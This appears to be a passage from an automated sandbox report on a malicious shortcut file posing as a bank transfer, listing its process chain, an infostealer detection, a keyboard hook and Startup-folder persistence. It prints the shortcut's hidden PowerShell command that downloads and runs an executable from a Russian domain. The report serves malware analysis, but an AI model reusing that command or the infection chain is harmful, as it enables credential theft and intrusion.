                    Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oootorgline.ru
                    Source: powershell.exe, 00000000.00000002.2262113733.0000022129169000.00000004.00000800.00020000.00000000.sdmp, RTGS-WB-ABS-240730-NEW.lnkString found in binary or memory: https://oootorgline.ru/components/grace.exe
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60910 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 61245 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61253
                    Source: unknownNetwork traffic detected: HTTP traffic on port 61253 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60910
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61245
                    Source: unknownHTTPS traffic detected: 176.99.3.36:443 -> 192.168.2.6:61245 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:61253 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:60910 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\file.exeJump to dropped file
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Windows shortcut file (LNK) contains suspicious command line arguments
                    Source: RTGS-WB-ABS-240730-NEW.lnkLNK file: -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0167F2688_2_0167F268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01674BD88_2_01674BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0167BC108_2_0167BC10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01673FC08_2_01673FC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_016743088_2_01674308
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E558778_2_06E55877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E530188_2_06E53018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E5B1C98_2_06E5B1C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E561888_2_06E56188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E551508_2_06E55150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E5C1308_2_06E5C130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E579188_2_06E57918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E572388_2_06E57238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E5E3588_2_06E5E358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E500408_2_06E50040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06E5001F8_2_06E5001F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DEF26812_2_00DEF268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DE430812_2_00DE4308
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DEB44012_2_00DEB440
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DE4BD812_2_00DE4BD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DEBC1012_2_00DEBC10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DE3FC012_2_00DE3FC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00DE0D2412_2_00DE0D24
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663234812_2_06632348
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663515012_2_06635150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663C13012_2_0663C130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663791812_2_06637918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663B1D812_2_0663B1D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663618812_2_06636188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663723812_2_06637238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663E35812_2_0663E358
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663004012_2_06630040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663588812_2_06635888
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663002312_2_06630023
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0663000712_2_06630007
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winLNK@17/13@8/5
                    Source: C:\Users\user\AppData\Local\Temp\file.exeFile created: C:\Users\user\AppData\Local\unspatteredJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duy0shnp.1z5.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: RTGS-WB-ABS-240730-NEW.lnkReversingLabs: Detection: 23%
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                    Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\file.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe "C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeProcess created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\file.exe" Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe" Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\file.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
